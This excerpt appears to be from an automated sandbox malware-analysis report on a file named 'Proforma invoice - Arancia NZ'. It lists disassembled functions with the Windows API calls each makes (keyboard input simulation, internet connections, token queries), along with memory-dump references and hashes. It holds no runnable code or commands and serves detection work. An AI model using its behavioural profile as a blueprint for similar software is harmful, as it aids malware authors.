                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002D88DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: c764609c7fb5dc2ad9e46c4a3fdae64beb8a6ab75f6ec1f475e39635a49c3505
                                                                                                                    • Instruction ID: 27a59dc21c6f10eaa5032fdc1921e7d7ab40a4ce8014631518fab888f089e2f6
                                                                                                                    • Opcode Fuzzy Hash: c764609c7fb5dc2ad9e46c4a3fdae64beb8a6ab75f6ec1f475e39635a49c3505
                                                                                                                    • Instruction Fuzzy Hash: 8731C134620109EFEB219F58DC59FFC77A5EB09310FA44113FA91E63A1CA70ED609B96
                                                                                                                    Function 002DAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002DAB60
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002DABD6
                                                                                                                    • PtInRect.USER32(?,?,002DC014), ref: 002DABE6
                                                                                                                    • MessageBeep.USER32(00000000), ref: 002DAC57
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: 4f64e53043eaa83711519e3509e5cf41b21b485024da791f0530aa84603e0c5e
                                                                                                                    • Instruction ID: ab305b5964abe42fd228c7cd0bf714d81a84d48bf427d6c937bd1a027eb8afb2
                                                                                                                    • Opcode Fuzzy Hash: 4f64e53043eaa83711519e3509e5cf41b21b485024da791f0530aa84603e0c5e
                                                                                                                    • Instruction Fuzzy Hash: AD413830A20119DFCB11DF58D884EA97BF5BB49720F1880ABE8159B360D730AD51CB92
                                                                                                                    Function 002B0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002B0B27
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 002B0B43
                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002B0BA9
                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002B0BFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: f174229552de80ee41531278a87affe54d83eeff8720e532762b29ce117c3953
                                                                                                                    • Instruction ID: 2f7332a1ff1e464390c78de352f6b5401f8cbc107d4720eb9832ad6e926f2242
                                                                                                                    • Opcode Fuzzy Hash: f174229552de80ee41531278a87affe54d83eeff8720e532762b29ce117c3953
                                                                                                                    • Instruction Fuzzy Hash: 7D319A30D60209AEFF328F258C89BFBBBA9EB4539CF08435AE591521E1C3B48D609755
                                                                                                                    Function 002B0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 002B0C66
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 002B0C82
                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 002B0CE1
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 002B0D33
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 975b192b549689d55146ce2b1b830cf9fcec7a78bf56a2e63ca0b2bf638e6670
                                                                                                                    • Instruction ID: 012e32564ad0b82a6b5538164806565bf06173bee030cc2101308650ec557402
                                                                                                                    • Opcode Fuzzy Hash: 975b192b549689d55146ce2b1b830cf9fcec7a78bf56a2e63ca0b2bf638e6670
                                                                                                                    • Instruction Fuzzy Hash: 693166309202096EFF328E659C58BFFBF66EB45360F04831BE481521D1C7789D658795
                                                                                                                    Function 002861C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002861FB
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00286229
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00286257
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0028628D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: 8d67987681a3dfa73002bea28d0d967ff72ad5c9842557dc6ebfed1899615713
                                                                                                                    • Instruction ID: b69e2f6f35adfdf70cf374ee0e74e3829f20727f87c14f06e5be0b328300ac96
                                                                                                                    • Opcode Fuzzy Hash: 8d67987681a3dfa73002bea28d0d967ff72ad5c9842557dc6ebfed1899615713
                                                                                                                    • Instruction Fuzzy Hash: 7431C134612246AFDF21AF64CC4CBAA7BA9FF41310F154069E828971D1D771ED60DB50
                                                                                                                    Function 002D4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 002D4F02
                                                                                                                      • Part of subcall function 002B3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002B365B
                                                                                                                      • Part of subcall function 002B3641: GetCurrentThreadId.KERNEL32 ref: 002B3662
                                                                                                                      • Part of subcall function 002B3641: AttachThreadInput.USER32(00000000,?,002B5005), ref: 002B3669
                                                                                                                    • GetCaretPos.USER32(?), ref: 002D4F13
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 002D4F4E
                                                                                                                    • GetForegroundWindow.USER32 ref: 002D4F54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2759813231-0
                                                                                                                    • Opcode ID: 2d8e56944deac8c5b366c22af99d588be5f49c676358c911f29da4999844d3e6
                                                                                                                    • Instruction ID: ffc24a664f75536c21c0c2154dbc423b61f214b1f22a3b4008f33bc44d2a5ad9
                                                                                                                    • Opcode Fuzzy Hash: 2d8e56944deac8c5b366c22af99d588be5f49c676358c911f29da4999844d3e6
                                                                                                                    • Instruction Fuzzy Hash: 7B312C72D10108AFDB00EFA5C9859EFB7F9EF88300F10446AE815E7241DA719E55CFA4
                                                                                                                    Function 002DC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • GetCursorPos.USER32(?), ref: 002DC4D2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0028B9AB,?,?,?,?,?), ref: 002DC4E7
                                                                                                                    • GetCursorPos.USER32(?), ref: 002DC534
                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0028B9AB,?,?,?), ref: 002DC56E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    • Opcode ID: a8c54da72437057e9450c4aef2890c8107125ffa9aa1955770b2b977cf4aff58
                                                                                                                    • Instruction ID: 1c1c056a1862f2da2307f790605a800f31a013a09ab19fb98c5f2b8c6ab3b7bd
                                                                                                                    • Opcode Fuzzy Hash: a8c54da72437057e9450c4aef2890c8107125ffa9aa1955770b2b977cf4aff58
                                                                                                                    • Instruction Fuzzy Hash: 9D31B635620019EFCB15CF98E858EEA7BB9EB49310F944066F9059B3A1C731AD60DFA4
                                                                                                                    Function 002A8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8121
                                                                                                                      • Part of subcall function 002A810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A812B
                                                                                                                      • Part of subcall function 002A810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A813A
                                                                                                                      • Part of subcall function 002A810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8141
                                                                                                                      • Part of subcall function 002A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8157
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002A86A3
                                                                                                                    • _memcmp.LIBCMT ref: 002A86C6
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A86FC
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 002A8703
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1592001646-0
                                                                                                                    • Opcode ID: 31074984c18815598b01b6c92235c18b4d0e55f05c40ee0e8f4331a81071d021
                                                                                                                    • Instruction ID: 3e9bada5ccaffad5b629714c388b7fecc1920023631032516d1530433ca46b03
                                                                                                                    • Opcode Fuzzy Hash: 31074984c18815598b01b6c92235c18b4d0e55f05c40ee0e8f4331a81071d021
                                                                                                                    • Instruction Fuzzy Hash: 35219071E51109EFEB10DFA4CA49BEEB7B8EF45705F15805AE445A7240DF30AE15CB50
                                                                                                                    Function 0027098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __setmode.LIBCMT ref: 002709AE
                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7896,?,?,00000000), ref: 00255A2C
                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7896,?,?,00000000,?,?), ref: 00255A50
                                                                                                                    • _fprintf.LIBCMT ref: 002709E5
                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 002A5DBB
                                                                                                                      • Part of subcall function 00274AAA: _flsall.LIBCMT ref: 00274AC3
                                                                                                                    • __setmode.LIBCMT ref: 00270A1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 521402451-0
                                                                                                                    • Opcode ID: 09dbd2f95b5ef5b6f50ce1d137dee4b5c1ef274c44aacf4ddd41e54f6998d587
                                                                                                                    • Instruction ID: 627df0c6ccf85c6e3d53a9b3a6e16376d316073dc01a23e91f000a38886ef51b
                                                                                                                    • Opcode Fuzzy Hash: 09dbd2f95b5ef5b6f50ce1d137dee4b5c1ef274c44aacf4ddd41e54f6998d587
                                                                                                                    • Instruction Fuzzy Hash: 0C115731924614AFCB04B7B49C8A8FE77AC9F46320F248015F60852182EF7048BA9BA5
                                                                                                                    Function 002C1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C17A3
                                                                                                                      • Part of subcall function 002C182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002C184C
                                                                                                                      • Part of subcall function 002C182D: InternetCloseHandle.WININET(00000000), ref: 002C18E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    • Opcode ID: 82bc369a4240a0de02e5b341b8025513eacda1a5545e7b65109ea91af60d2043
                                                                                                                    • Instruction ID: 0186acfcca8e63c0c7431f1ebaa0ee65835f0f50513da816b725a3cff2113a33
                                                                                                                    • Opcode Fuzzy Hash: 82bc369a4240a0de02e5b341b8025513eacda1a5545e7b65109ea91af60d2043
                                                                                                                    • Instruction Fuzzy Hash: BC210431224601BFFB168F60DC02FBABBA9FF4A700F10422EF90196551DB71D8309BA0
                                                                                                                    Function 002B3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?,002DFAC0), ref: 002B3A64
                                                                                                                    • GetLastError.KERNEL32 ref: 002B3A73
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 002B3A82
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002DFAC0), ref: 002B3ADF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: e2dc9783a62be072d2bcfc1342704c41abae5ffc60b04a5e1f3b5c73eae1d236
                                                                                                                    • Instruction ID: e0ebe6a29b006c788ed62e786af52465a133e963be733d51445fb40395f6298c
                                                                                                                    • Opcode Fuzzy Hash: e2dc9783a62be072d2bcfc1342704c41abae5ffc60b04a5e1f3b5c73eae1d236
                                                                                                                    • Instruction Fuzzy Hash: FD21D6755182028F8300DF28D9858AA77E4BF553A4F244A1EF8DAC72A1D731DE19CB86
                                                                                                                    Function 002850E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00285101
                                                                                                                      • Part of subcall function 0027571C: __FF_MSGBANNER.LIBCMT ref: 00275733
                                                                                                                      • Part of subcall function 0027571C: __NMSG_WRITE.LIBCMT ref: 0027573A
                                                                                                                      • Part of subcall function 0027571C: RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,00000000,?,?,?,00270DD3,?), ref: 0027575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: cd803149e97c64d6c226bcdc71ecf2bb40d3080376589b530fa68f296f10c4d8
                                                                                                                    • Instruction ID: 102817c4b9f48a96ce4766c299d7c3075eb82b01dfeddc5d7eb03961b6a073f9
                                                                                                                    • Opcode Fuzzy Hash: cd803149e97c64d6c226bcdc71ecf2bb40d3080376589b530fa68f296f10c4d8
                                                                                                                    • Instruction Fuzzy Hash: E211A376932A22AECB313F74EC4D75E37989F04361B10952AF90DE61D0DF7489609B94
                                                                                                                    Function 002544A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002544CF
                                                                                                                      • Part of subcall function 0025407C: _memset.LIBCMT ref: 002540FC
                                                                                                                      • Part of subcall function 0025407C: _wcscpy.LIBCMT ref: 00254150
                                                                                                                      • Part of subcall function 0025407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00254160
                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00254524
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00254533
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0028D4B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1378193009-0
                                                                                                                    • Opcode ID: a9d7e0ca169cbe000105acae71b7a5ac8f7542e281f64a19f260590cd827296d
                                                                                                                    • Instruction ID: d36db5b074e9706a8aa8267b9a90040c82c14a4068879dce4ba5ad092f43fee6
                                                                                                                    • Opcode Fuzzy Hash: a9d7e0ca169cbe000105acae71b7a5ac8f7542e281f64a19f260590cd827296d
                                                                                                                    • Instruction Fuzzy Hash: AD213774815384AFE732AF249849BE6FBECAF15309F04008EEB8E561C1C3B0299CCB45
                                                                                                                    Function 002C6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7896,?,?,00000000), ref: 00255A2C
                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7896,?,?,00000000,?,?), ref: 00255A50
                                                                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 002C6399
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C63A4
                                                                                                                    • _memmove.LIBCMT ref: 002C63D1
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 002C63DC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
